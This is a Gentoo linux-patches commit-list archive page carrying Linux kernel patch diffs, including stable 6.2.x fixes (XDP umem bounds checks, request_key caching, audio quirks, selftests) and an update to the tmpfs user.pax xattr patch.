+-	unsigned int chunks, chunks_rem;
++	u32 chunk_size = mr->chunk_size, headroom = mr->headroom;
++	u64 addr = mr->addr, size = mr->len;
++	u32 chunks_rem, npgs_rem;
++	u64 chunks, npgs;
+ 	int err;
+ 
+ 	if (chunk_size < XDP_UMEM_MIN_CHUNK_SIZE || chunk_size > PAGE_SIZE) {
+@@ -188,8 +189,8 @@ static int xdp_umem_reg(struct xdp_umem *umem, struct xdp_umem_reg *mr)
+ 	if (npgs > U32_MAX)
+ 		return -EINVAL;
+ 
+-	chunks = (unsigned int)div_u64_rem(size, chunk_size, &chunks_rem);
+-	if (chunks == 0)
++	chunks = div_u64_rem(size, chunk_size, &chunks_rem);
++	if (!chunks || chunks > U32_MAX)
+ 		return -EINVAL;
+ 
+ 	if (!unaligned_chunks && chunks_rem)
+@@ -202,7 +203,7 @@ static int xdp_umem_reg(struct xdp_umem *umem, struct xdp_umem_reg *mr)
+ 	umem->headroom = headroom;
+ 	umem->chunk_size = chunk_size;
+ 	umem->chunks = chunks;
+-	umem->npgs = (u32)npgs;
++	umem->npgs = npgs;
+ 	umem->pgs = NULL;
+ 	umem->user = NULL;
+ 	umem->flags = mr->flags;
+diff --git a/security/keys/request_key.c b/security/keys/request_key.c
+index 2da4404276f0f..07a0ef2baacd8 100644
+--- a/security/keys/request_key.c
++++ b/security/keys/request_key.c
+@@ -38,9 +38,12 @@ static void cache_requested_key(struct key *key)
+ #ifdef CONFIG_KEYS_REQUEST_CACHE
+ 	struct task_struct *t = current;
+ 
+-	key_put(t->cached_requested_key);
+-	t->cached_requested_key = key_get(key);
+-	set_tsk_thread_flag(t, TIF_NOTIFY_RESUME);
++	/* Do not cache key if it is a kernel thread */
++	if (!(t->flags & PF_KTHREAD)) {
++		key_put(t->cached_requested_key);
++		t->cached_requested_key = key_get(key);
++		set_tsk_thread_flag(t, TIF_NOTIFY_RESUME);
++	}
+ #endif
+ }
+ 
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 36314753923b8..4a69ce702360c 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -255,6 +255,20 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "15NBC1011"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "OMEN by HP Gaming Laptop 16z-n000"),
++		}
++	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
++			DMI_MATCH(DMI_BOARD_NAME, "8A43"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/intel/boards/sof_rt5682.c b/sound/soc/intel/boards/sof_rt5682.c
+index 71a11d747622a..4fe448295a902 100644
+--- a/sound/soc/intel/boards/sof_rt5682.c
++++ b/sound/soc/intel/boards/sof_rt5682.c
+@@ -223,6 +223,20 @@ static const struct dmi_system_id sof_rt5682_quirk_table[] = {
+ 					SOF_RT5682_SSP_AMP(2) |
+ 					SOF_RT5682_NUM_HDMIDEV(4)),
+ 	},
++	{
++		.callback = sof_rt5682_quirk_cb,
++		.matches = {
++			DMI_MATCH(DMI_PRODUCT_FAMILY, "Google_Rex"),
++			DMI_MATCH(DMI_OEM_STRING, "AUDIO-MAX98360_ALC5682I_I2S"),
++		},
++		.driver_data = (void *)(SOF_RT5682_MCLK_EN |
++					SOF_RT5682_SSP_CODEC(2) |
++					SOF_SPEAKER_AMP_PRESENT |
++					SOF_MAX98360A_SPEAKER_AMP_PRESENT |
++					SOF_RT5682_SSP_AMP(0) |
++					SOF_RT5682_NUM_HDMIDEV(4)
++					),
++	},
+ 	{
+ 		.callback = sof_rt5682_quirk_cb,
+ 		.matches = {
+@@ -1105,6 +1119,15 @@ static const struct platform_device_id board_ids[] = {
+ 					SOF_RT5682_SSP_AMP(1) |
+ 					SOF_RT5682_NUM_HDMIDEV(4)),
+ 	},
++	{
++		.name = "mtl_mx98360_rt5682",
++		.driver_data = (kernel_ulong_t)(SOF_RT5682_MCLK_EN |
++					SOF_RT5682_SSP_CODEC(0) |
++					SOF_SPEAKER_AMP_PRESENT |
++					SOF_MAX98360A_SPEAKER_AMP_PRESENT |
++					SOF_RT5682_SSP_AMP(1) |
++					SOF_RT5682_NUM_HDMIDEV(4)),
++	},
+ 	{
+ 		.name = "jsl_rt5682",
+ 		.driver_data = (kernel_ulong_t)(SOF_RT5682_MCLK_EN |
+diff --git a/sound/soc/intel/common/soc-acpi-intel-mtl-match.c b/sound/soc/intel/common/soc-acpi-intel-mtl-match.c
+index b1a66a0f68181..7911c3af8071f 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-mtl-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-mtl-match.c
+@@ -15,6 +15,11 @@ static const struct snd_soc_acpi_codecs mtl_max98357a_amp = {
+ 	.codecs = {"MX98357A"}
+ };
+ 
++static const struct snd_soc_acpi_codecs mtl_max98360a_amp = {
++	.num_codecs = 1,
++	.codecs = {"MX98360A"}
++};
++
+ static const struct snd_soc_acpi_codecs mtl_rt5682_rt5682s_hp = {
+ 	.num_codecs = 2,
+ 	.codecs = {"10EC5682", "RTL5682"},
+@@ -28,6 +33,13 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_mtl_machines[] = {
+ 		.quirk_data = &mtl_max98357a_amp,
+ 		.sof_tplg_filename = "sof-mtl-max98357a-rt5682.tplg",
+ 	},
++	{
++		.comp_ids = &mtl_rt5682_rt5682s_hp,
++		.drv_name = "mtl_mx98360_rt5682",
++		.machine_quirk = snd_soc_acpi_codec_list,
++		.quirk_data = &mtl_max98360a_amp,
++		.sof_tplg_filename = "sof-mtl-max98360a-rt5682.tplg",
++	},
+ 	{},
+ };
+ EXPORT_SYMBOL_GPL(snd_soc_acpi_intel_mtl_machines);
+diff --git a/tools/bootconfig/test-bootconfig.sh b/tools/bootconfig/test-bootconfig.sh
+index f68e2e9eef8b2..a2c484c243f5d 100755
+--- a/tools/bootconfig/test-bootconfig.sh
++++ b/tools/bootconfig/test-bootconfig.sh
+@@ -87,10 +87,14 @@ xfail grep -i "error" $OUTFILE
+ 
+ echo "Max node number check"
+ 
+-echo -n > $TEMPCONF
+-for i in `seq 1 1024` ; do
+-   echo "node$i" >> $TEMPCONF
+-done
++awk '
++BEGIN {
++  for (i = 0; i < 26; i += 1)
++      printf("%c\n", 65 + i % 26)
++  for (i = 26; i < 8192; i += 1)
++      printf("%c%c%c\n", 65 + i % 26, 65 + (i / 26) % 26, 65 + (i / 26 / 26))
++}
++' > $TEMPCONF
+ xpass $BOOTCONF -a $TEMPCONF $INITRD
+ 
+ echo "badnode" >> $TEMPCONF
+diff --git a/tools/testing/selftests/bpf/prog_tests/btf.c b/tools/testing/selftests/bpf/prog_tests/btf.c
+index de1b5b9eb93a8..d8d1292e73b53 100644
+--- a/tools/testing/selftests/bpf/prog_tests/btf.c
++++ b/tools/testing/selftests/bpf/prog_tests/btf.c
+@@ -879,6 +879,34 @@ static struct btf_raw_test raw_tests[] = {
+ 	.btf_load_err = true,
+ 	.err_str = "Invalid elem",
+ },
++{
++	.descr = "var after datasec, ptr followed by modifier",
++	.raw_types = {
++		/* .bss section */				/* [1] */
++		BTF_TYPE_ENC(NAME_TBD, BTF_INFO_ENC(BTF_KIND_DATASEC, 0, 2),
++			sizeof(void*)+4),
++		BTF_VAR_SECINFO_ENC(4, 0, sizeof(void*)),
++		BTF_VAR_SECINFO_ENC(6, sizeof(void*), 4),
++		/* int */					/* [2] */
++		BTF_TYPE_INT_ENC(0, BTF_INT_SIGNED, 0, 32, 4),
++		/* int* */					/* [3] */
++		BTF_TYPE_ENC(0, BTF_INFO_ENC(BTF_KIND_PTR, 0, 0), 2),
++		BTF_VAR_ENC(NAME_TBD, 3, 0),			/* [4] */
++		/* const int */					/* [5] */
++		BTF_TYPE_ENC(0, BTF_INFO_ENC(BTF_KIND_CONST, 0, 0), 2),
++		BTF_VAR_ENC(NAME_TBD, 5, 0),			/* [6] */
++		BTF_END_RAW,
++	},
++	.str_sec = "\0a\0b\0c\0",
++	.str_sec_size = sizeof("\0a\0b\0c\0"),
++	.map_type = BPF_MAP_TYPE_ARRAY,
++	.map_name = ".bss",
++	.key_size = sizeof(int),
++	.value_size = sizeof(void*)+4,
++	.key_type_id = 0,
++	.value_type_id = 1,
++	.max_entries = 1,
++},
+ /* Test member exceeds the size of struct.
+  *
+  * struct A {
+diff --git a/tools/testing/selftests/net/forwarding/tc_actions.sh b/tools/testing/selftests/net/forwarding/tc_actions.sh
+index 1e0a62f638fec..919c0dd9fe4bc 100755
+--- a/tools/testing/selftests/net/forwarding/tc_actions.sh
++++ b/tools/testing/selftests/net/forwarding/tc_actions.sh
+@@ -3,7 +3,8 @@
+ 
+ ALL_TESTS="gact_drop_and_ok_test mirred_egress_redirect_test \
+ 	mirred_egress_mirror_test matchall_mirred_egress_mirror_test \
+-	gact_trap_test mirred_egress_to_ingress_test"
++	gact_trap_test mirred_egress_to_ingress_test \
++	mirred_egress_to_ingress_tcp_test"
+ NUM_NETIFS=4
+ source tc_common.sh
+ source lib.sh
+@@ -198,6 +199,52 @@ mirred_egress_to_ingress_test()
+ 	log_test "mirred_egress_to_ingress ($tcflags)"
+ }
+ 
++mirred_egress_to_ingress_tcp_test()
++{
++	local tmpfile=$(mktemp) tmpfile1=$(mktemp)
++
++	RET=0
++	dd conv=sparse status=none if=/dev/zero bs=1M count=2 of=$tmpfile
++	tc filter add dev $h1 protocol ip pref 100 handle 100 egress flower \
++		$tcflags ip_proto tcp src_ip 192.0.2.1 dst_ip 192.0.2.2 \
++			action ct commit nat src addr 192.0.2.2 pipe \
++			action ct clear pipe \
++			action ct commit nat dst addr 192.0.2.1 pipe \
++			action ct clear pipe \
++			action skbedit ptype host pipe \
++			action mirred ingress redirect dev $h1
++	tc filter add dev $h1 protocol ip pref 101 handle 101 egress flower \
++		$tcflags ip_proto icmp \
++			action mirred ingress redirect dev $h1
++	tc filter add dev $h1 protocol ip pref 102 handle 102 ingress flower \
++		ip_proto icmp \
++			action drop
++
++	ip vrf exec v$h1 nc --recv-only -w10 -l -p 12345 -o $tmpfile1  &
++	local rpid=$!
++	ip vrf exec v$h1 nc -w1 --send-only 192.0.2.2 12345 <$tmpfile
++	wait -n $rpid
++	cmp -s $tmpfile $tmpfile1
++	check_err $? "server output check failed"
++
++	$MZ $h1 -c 10 -p 64 -a $h1mac -b $h1mac -A 192.0.2.1 -B 192.0.2.1 \
++		-t icmp "ping,id=42,seq=5" -q
++	tc_check_packets "dev $h1 egress" 101 10
++	check_err $? "didn't mirred redirect ICMP"
++	tc_check_packets "dev $h1 ingress" 102 10
++	check_err $? "didn't drop mirred ICMP"
++	local overlimits=$(tc_rule_stats_get ${h1} 101 egress .overlimits)
++	test ${overlimits} = 10
++	check_err $? "wrong overlimits, expected 10 got ${overlimits}"
++
++	tc filter del dev $h1 egress protocol ip pref 100 handle 100 flower
++	tc filter del dev $h1 egress protocol ip pref 101 handle 101 flower
++	tc filter del dev $h1 ingress protocol ip pref 102 handle 102 flower
++
++	rm -f $tmpfile $tmpfile1
++	log_test "mirred_egress_to_ingress_tcp ($tcflags)"
++}
++
+ setup_prepare()
+ {
+ 	h1=${NETIFS[p1]}
+diff --git a/tools/testing/selftests/x86/amx.c b/tools/testing/selftests/x86/amx.c
+index 625e42901237c..d884fd69dd510 100644
+--- a/tools/testing/selftests/x86/amx.c
++++ b/tools/testing/selftests/x86/amx.c
+@@ -14,8 +14,10 @@
+ #include <sys/auxv.h>
+ #include <sys/mman.h>
+ #include <sys/shm.h>
++#include <sys/ptrace.h>
+ #include <sys/syscall.h>
+ #include <sys/wait.h>
++#include <sys/uio.h>
+ 
+ #include "../kselftest.h" /* For __cpuid_count() */
+ 
+@@ -583,6 +585,13 @@ static void test_dynamic_state(void)
+ 	_exit(0);
+ }
+ 
++static inline int __compare_tiledata_state(struct xsave_buffer *xbuf1, struct xsave_buffer *xbuf2)
++{
++	return memcmp(&xbuf1->bytes[xtiledata.xbuf_offset],
++		      &xbuf2->bytes[xtiledata.xbuf_offset],
++		      xtiledata.size);
++}
++
+ /*
+  * Save current register state and compare it to @xbuf1.'
+  *
+@@ -599,9 +608,7 @@ static inline bool __validate_tiledata_regs(struct xsave_buffer *xbuf1)
+ 		fatal_error("failed to allocate XSAVE buffer\n");
+ 
+ 	xsave(xbuf2, XFEATURE_MASK_XTILEDATA);
+-	ret = memcmp(&xbuf1->bytes[xtiledata.xbuf_offset],
+-		     &xbuf2->bytes[xtiledata.xbuf_offset],
+-		     xtiledata.size);
++	ret = __compare_tiledata_state(xbuf1, xbuf2);
+ 
+ 	free(xbuf2);
+ 
+@@ -826,6 +833,99 @@ static void test_context_switch(void)
+ 	free(finfo);
+ }
+ 
++/* Ptrace test */
++
++/*
++ * Make sure the ptracee has the expanded kernel buffer on the first
++ * use. Then, initialize the state before performing the state
++ * injection from the ptracer.
++ */
++static inline void ptracee_firstuse_tiledata(void)
++{
++	load_rand_tiledata(stashed_xsave);
++	init_xtiledata();
++}
++
++/*
++ * Ptracer injects the randomized tile data state. It also reads
++ * before and after that, which will execute the kernel's state copy
++ * functions. So, the tester is advised to double-check any emitted
++ * kernel messages.
++ */
++static void ptracer_inject_tiledata(pid_t target)
++{
++	struct xsave_buffer *xbuf;
++	struct iovec iov;
++
++	xbuf = alloc_xbuf();
++	if (!xbuf)
++		fatal_error("unable to allocate XSAVE buffer");
++
++	printf("\tRead the init'ed tiledata via ptrace().\n");
++
++	iov.iov_base = xbuf;
++	iov.iov_len = xbuf_size;
++
++	memset(stashed_xsave, 0, xbuf_size);
++
++	if (ptrace(PTRACE_GETREGSET, target, (uint32_t)NT_X86_XSTATE, &iov))
++		fatal_error("PTRACE_GETREGSET");
++
++	if (!__compare_tiledata_state(stashed_xsave, xbuf))
++		printf("[OK]\tThe init'ed tiledata was read from ptracee.\n");
++	else
++		printf("[FAIL]\tThe init'ed tiledata was not read from ptracee.\n");
++
++	printf("\tInject tiledata via ptrace().\n");
++
++	load_rand_tiledata(xbuf);
++
++	memcpy(&stashed_xsave->bytes[xtiledata.xbuf_offset],
++	       &xbuf->bytes[xtiledata.xbuf_offset],
++	       xtiledata.size);
++
++	if (ptrace(PTRACE_SETREGSET, target, (uint32_t)NT_X86_XSTATE, &iov))
++		fatal_error("PTRACE_SETREGSET");
++
++	if (ptrace(PTRACE_GETREGSET, target, (uint32_t)NT_X86_XSTATE, &iov))
++		fatal_error("PTRACE_GETREGSET");
++
++	if (!__compare_tiledata_state(stashed_xsave, xbuf))
++		printf("[OK]\tTiledata was correctly written to ptracee.\n");
++	else
++		printf("[FAIL]\tTiledata was not correctly written to ptracee.\n");
++}
++
++static void test_ptrace(void)
++{
++	pid_t child;
++	int status;
++
++	child = fork();
++	if (child < 0) {
++		err(1, "fork");
++	} else if (!child) {
++		if (ptrace(PTRACE_TRACEME, 0, NULL, NULL))
++			err(1, "PTRACE_TRACEME");
++
++		ptracee_firstuse_tiledata();
++
++		raise(SIGTRAP);
++		_exit(0);
++	}
++
++	do {
++		wait(&status);
++	} while (WSTOPSIG(status) != SIGTRAP);
++
++	ptracer_inject_tiledata(child);
++
++	ptrace(PTRACE_DETACH, child, NULL, NULL);
++	wait(&status);
++	if (!WIFEXITED(status) || WEXITSTATUS(status))
++		err(1, "ptrace test");
++}
++
+ int main(void)
+ {
+ 	/* Check hardware availability at first */
+@@ -846,6 +946,8 @@ int main(void)
+ 	ctxtswtest_config.num_threads = 5;
+ 	test_context_switch();
+ 
++	test_ptrace();
++
+ 	clearhandler(SIGILL);
+ 	free_stashed_xsave();
+ 


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-29 23:09 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-29 23:09 UTC (permalink / raw
  To: gentoo-commits

commit:     1c3a77c0734cfe6d829f2f1d90577e46b4de1a8f
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Mar 29 23:08:27 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Mar 29 23:08:27 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1c3a77c0

Update namespace user.pax.* on tmpfs patch

Bug: https://bugs.gentoo.org/show_bug.cgi?id=903513

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 1500_XATTR_USER_PREFIX.patch | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/1500_XATTR_USER_PREFIX.patch b/1500_XATTR_USER_PREFIX.patch
index fac3eed7..1d1a9301 100644
--- a/1500_XATTR_USER_PREFIX.patch
+++ b/1500_XATTR_USER_PREFIX.patch
@@ -26,12 +26,12 @@ the XATTR_PAX flags preserved.
 +#define XATTR_NAME_PAX_FLAGS XATTR_PAX_PREFIX XATTR_PAX_FLAGS_SUFFIX
  
  #endif /* _UAPI_LINUX_XATTR_H */
---- a/mm/shmem.c	2022-11-22 05:57:29.011626215 -0500
-+++ b/mm/shmem.c	2022-11-22 06:03:33.165939400 -0500
-@@ -3297,6 +3297,14 @@ static int shmem_xattr_handler_set(const
- 	struct shmem_inode_info *info = SHMEM_I(inode);
+--- a/mm/shmem.c	2023-03-29 18:54:52.431866914 -0400
++++ b/mm/shmem.c	2023-03-29 18:57:55.145689335 -0400
+@@ -3310,6 +3310,14 @@ static int shmem_xattr_handler_set(const
  	int err;
  
+ 	name = xattr_full_name(handler, name);
 +
 +	if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN)) {
 +		if (strcmp(name, XATTR_NAME_PAX_FLAGS))
@@ -40,10 +40,10 @@ the XATTR_PAX flags preserved.
 +			return -EINVAL;
 +	}
 +
- 	name = xattr_full_name(handler, name);
  	err = simple_xattr_set(&info->xattrs, name, value, size, flags, NULL);
  	if (!err) {
-@@ -3312,6 +3320,12 @@ static const struct xattr_handler shmem_
+ 		inode->i_ctime = current_time(inode);
+@@ -3324,6 +3332,12 @@ static const struct xattr_handler shmem_
  	.set = shmem_xattr_handler_set,
  };
  
@@ -56,7 +56,7 @@ the XATTR_PAX flags preserved.
  static const struct xattr_handler shmem_trusted_xattr_handler = {
  	.prefix = XATTR_TRUSTED_PREFIX,
  	.get = shmem_xattr_handler_get,
-@@ -3325,6 +3339,7 @@ static const struct xattr_handler *shmem
+@@ -3337,6 +3351,7 @@ static const struct xattr_handler *shmem
  #endif
  	&shmem_security_xattr_handler,
  	&shmem_trusted_xattr_handler,


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-22 16:10 Alice Ferrazzi
  0 siblings, 0 replies; 30+ messages in thread
From: Alice Ferrazzi @ 2023-03-22 16:10 UTC (permalink / raw
  To: gentoo-commits

commit:     9d6c7d6da33741e7aae39da8e1cff967ed5d3193
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Wed Mar 22 16:10:19 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Wed Mar 22 16:10:19 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=9d6c7d6d

Linux patch 6.2.8

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README            |    4 +
 1007_linux-6.2.8.patch | 7735 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 7739 insertions(+)

diff --git a/0000_README b/0000_README
index 110a64f7..a2d57d44 100644
--- a/0000_README
+++ b/0000_README
@@ -71,6 +71,10 @@ Patch:  1006_linux-6.2.7.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.7
 
+Patch:  1007_linux-6.2.8.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.8
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1007_linux-6.2.8.patch b/1007_linux-6.2.8.patch
new file mode 100644
index 00000000..e7c5754d
--- /dev/null
+++ b/1007_linux-6.2.8.patch
@@ -0,0 +1,7735 @@
+diff --git a/Documentation/filesystems/vfs.rst b/Documentation/filesystems/vfs.rst
+index 2c15e70531137..2f54e725bd743 100644
+--- a/Documentation/filesystems/vfs.rst
++++ b/Documentation/filesystems/vfs.rst
+@@ -1222,7 +1222,7 @@ defined:
+ 	return
+ 	-ECHILD and it will be called again in ref-walk mode.
+ 
+-``_weak_revalidate``
++``d_weak_revalidate``
+ 	called when the VFS needs to revalidate a "jumped" dentry.  This
+ 	is called when a path-walk ends at dentry that was not acquired
+ 	by doing a lookup in the parent directory.  This includes "/",
+diff --git a/Makefile b/Makefile
+index 43cf2c785cb1f..2c90d9b067f4a 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 7
++SUBLEVEL = 8
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/loongarch/kernel/time.c b/arch/loongarch/kernel/time.c
+index a6576dea590c0..4351f69d99501 100644
+--- a/arch/loongarch/kernel/time.c
++++ b/arch/loongarch/kernel/time.c
+@@ -140,16 +140,17 @@ static int get_timer_irq(void)
+ 
+ int constant_clockevent_init(void)
+ {
+-	int irq;
+ 	unsigned int cpu = smp_processor_id();
+ 	unsigned long min_delta = 0x600;
+ 	unsigned long max_delta = (1UL << 48) - 1;
+ 	struct clock_event_device *cd;
+-	static int timer_irq_installed = 0;
++	static int irq = 0, timer_irq_installed = 0;
+ 
+-	irq = get_timer_irq();
+-	if (irq < 0)
+-		pr_err("Failed to map irq %d (timer)\n", irq);
++	if (!timer_irq_installed) {
++		irq = get_timer_irq();
++		if (irq < 0)
++			pr_err("Failed to map irq %d (timer)\n", irq);
++	}
+ 
+ 	cd = &per_cpu(constant_clockevent_device, cpu);
+ 
+diff --git a/arch/powerpc/Makefile b/arch/powerpc/Makefile
+index 4fd630efe39d3..894d48cd04920 100644
+--- a/arch/powerpc/Makefile
++++ b/arch/powerpc/Makefile
+@@ -146,19 +146,6 @@ CFLAGS-$(CONFIG_PPC32)	+= $(call cc-option, $(MULTIPLEWORD))
+ 
+ CFLAGS-$(CONFIG_PPC32)	+= $(call cc-option,-mno-readonly-in-sdata)
+ 
+-ifdef CONFIG_PPC_BOOK3S_64
+-ifdef CONFIG_CPU_LITTLE_ENDIAN
+-CFLAGS-$(CONFIG_GENERIC_CPU) += -mcpu=power8
+-else
+-CFLAGS-$(CONFIG_GENERIC_CPU) += -mcpu=power4
+-endif
+-CFLAGS-$(CONFIG_GENERIC_CPU) += $(call cc-option,-mtune=power10,	\
+-				  $(call cc-option,-mtune=power9,	\
+-				  $(call cc-option,-mtune=power8)))
+-else ifdef CONFIG_PPC_BOOK3E_64
+-CFLAGS-$(CONFIG_GENERIC_CPU) += -mcpu=powerpc64
+-endif
+-
+ ifdef CONFIG_FUNCTION_TRACER
+ CC_FLAGS_FTRACE := -pg
+ ifdef CONFIG_MPROFILE_KERNEL
+@@ -166,11 +153,12 @@ CC_FLAGS_FTRACE += -mprofile-kernel
+ endif
+ endif
+ 
+-CFLAGS-$(CONFIG_TARGET_CPU_BOOL) += $(call cc-option,-mcpu=$(CONFIG_TARGET_CPU))
+-AFLAGS-$(CONFIG_TARGET_CPU_BOOL) += $(call cc-option,-mcpu=$(CONFIG_TARGET_CPU))
++CFLAGS-$(CONFIG_TARGET_CPU_BOOL) += -mcpu=$(CONFIG_TARGET_CPU)
++AFLAGS-$(CONFIG_TARGET_CPU_BOOL) += -mcpu=$(CONFIG_TARGET_CPU)
+ 
+-CFLAGS-$(CONFIG_E5500_CPU) += $(call cc-option,-mcpu=e500mc64,-mcpu=powerpc64)
+-CFLAGS-$(CONFIG_E6500_CPU) += $(call cc-option,-mcpu=e6500,$(E5500_CPU))
++CFLAGS-$(CONFIG_POWERPC64_CPU) += $(call cc-option,-mtune=power10,	\
++				  $(call cc-option,-mtune=power9,	\
++				  $(call cc-option,-mtune=power8)))
+ 
+ asinstr := $(call as-instr,lis 9$(comma)foo@high,-DHAVE_AS_ATHIGH=1)
+ 
+@@ -213,10 +201,7 @@ KBUILD_CFLAGS += -fno-asynchronous-unwind-tables
+ # often slow when they are implemented at all
+ KBUILD_CFLAGS		+= $(call cc-option,-mno-string)
+ 
+-cpu-as-$(CONFIG_40x)		+= -Wa,-m405
+-cpu-as-$(CONFIG_44x)		+= -Wa,-m440
+ cpu-as-$(CONFIG_ALTIVEC)	+= $(call as-option,-Wa$(comma)-maltivec)
+-cpu-as-$(CONFIG_PPC_E500)		+= -Wa,-me500
+ 
+ # When using '-many -mpower4' gas will first try and find a matching power4
+ # mnemonic and failing that it will allow any valid mnemonic that GAS knows
+@@ -224,7 +209,6 @@ cpu-as-$(CONFIG_PPC_E500)		+= -Wa,-me500
+ # LLVM IAS doesn't understand either flag: https://github.com/ClangBuiltLinux/linux/issues/675
+ # but LLVM IAS only supports ISA >= 2.06 for Book3S 64 anyway...
+ cpu-as-$(CONFIG_PPC_BOOK3S_64)	+= $(call as-option,-Wa$(comma)-mpower4) $(call as-option,-Wa$(comma)-many)
+-cpu-as-$(CONFIG_PPC_E500MC)	+= $(call as-option,-Wa$(comma)-me500mc)
+ 
+ KBUILD_AFLAGS += $(cpu-as-y)
+ KBUILD_CFLAGS += $(cpu-as-y)
+diff --git a/arch/powerpc/boot/Makefile b/arch/powerpc/boot/Makefile
+index d32d95aea5d6f..295f76df13b55 100644
+--- a/arch/powerpc/boot/Makefile
++++ b/arch/powerpc/boot/Makefile
+@@ -39,13 +39,19 @@ BOOTCFLAGS    := -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs \
+ 		 $(LINUXINCLUDE)
+ 
+ ifdef CONFIG_PPC64_BOOT_WRAPPER
+-ifdef CONFIG_CPU_LITTLE_ENDIAN
+-BOOTCFLAGS	+= -m64 -mcpu=powerpc64le
++BOOTCFLAGS	+= -m64
+ else
+-BOOTCFLAGS	+= -m64 -mcpu=powerpc64
++BOOTCFLAGS	+= -m32
+ endif
++
++ifdef CONFIG_TARGET_CPU_BOOL
++BOOTCFLAGS	+= -mcpu=$(CONFIG_TARGET_CPU)
++else ifdef CONFIG_PPC64_BOOT_WRAPPER
++ifdef CONFIG_CPU_LITTLE_ENDIAN
++BOOTCFLAGS	+= -mcpu=powerpc64le
+ else
+-BOOTCFLAGS	+= -m32 -mcpu=powerpc
++BOOTCFLAGS	+= -mcpu=powerpc64
++endif
+ endif
+ 
+ BOOTCFLAGS	+= -isystem $(shell $(BOOTCC) -print-file-name=include)
+diff --git a/arch/powerpc/mm/fault.c b/arch/powerpc/mm/fault.c
+index 2bef19cc1b98c..af46aa88422bf 100644
+--- a/arch/powerpc/mm/fault.c
++++ b/arch/powerpc/mm/fault.c
+@@ -271,11 +271,16 @@ static bool access_error(bool is_write, bool is_exec, struct vm_area_struct *vma
+ 	}
+ 
+ 	/*
+-	 * Check for a read fault.  This could be caused by a read on an
+-	 * inaccessible page (i.e. PROT_NONE), or a Radix MMU execute-only page.
++	 * VM_READ, VM_WRITE and VM_EXEC all imply read permissions, as
++	 * defined in protection_map[].  Read faults can only be caused by
++	 * a PROT_NONE mapping, or with a PROT_EXEC-only mapping on Radix.
+ 	 */
+-	if (unlikely(!(vma->vm_flags & VM_READ)))
++	if (unlikely(!vma_is_accessible(vma)))
+ 		return true;
++
++	if (unlikely(radix_enabled() && ((vma->vm_flags & VM_ACCESS_FLAGS) == VM_EXEC)))
++		return true;
++
+ 	/*
+ 	 * We should ideally do the vma pkey access check here. But in the
+ 	 * fault path, handle_mm_fault() also does the same check. To avoid
+diff --git a/arch/powerpc/platforms/Kconfig.cputype b/arch/powerpc/platforms/Kconfig.cputype
+index 9563336e3348f..046b571496b13 100644
+--- a/arch/powerpc/platforms/Kconfig.cputype
++++ b/arch/powerpc/platforms/Kconfig.cputype
+@@ -118,19 +118,18 @@ endchoice
+ 
+ choice
+ 	prompt "CPU selection"
+-	default GENERIC_CPU
+ 	help
+ 	  This will create a kernel which is optimised for a particular CPU.
+ 	  The resulting kernel may not run on other CPUs, so use this with care.
+ 
+ 	  If unsure, select Generic.
+ 
+-config GENERIC_CPU
++config POWERPC64_CPU
+ 	bool "Generic (POWER5 and PowerPC 970 and above)"
+ 	depends on PPC_BOOK3S_64 && !CPU_LITTLE_ENDIAN
+ 	select PPC_64S_HASH_MMU
+ 
+-config GENERIC_CPU
++config POWERPC64_CPU
+ 	bool "Generic (POWER8 and above)"
+ 	depends on PPC_BOOK3S_64 && CPU_LITTLE_ENDIAN
+ 	select ARCH_HAS_FAST_MULTIPLIER
+@@ -144,6 +143,7 @@ config POWERPC_CPU
+ config CELL_CPU
+ 	bool "Cell Broadband Engine"
+ 	depends on PPC_BOOK3S_64 && !CPU_LITTLE_ENDIAN
++	depends on !CC_IS_CLANG
+ 	select PPC_64S_HASH_MMU
+ 
+ config PPC_970_CPU
+@@ -188,11 +188,13 @@ config E5500_CPU
+ config E6500_CPU
+ 	bool "Freescale e6500"
+ 	depends on PPC64 && PPC_E500
++	depends on !CC_IS_CLANG
+ 	select PPC_HAS_LBARX_LHARX
+ 
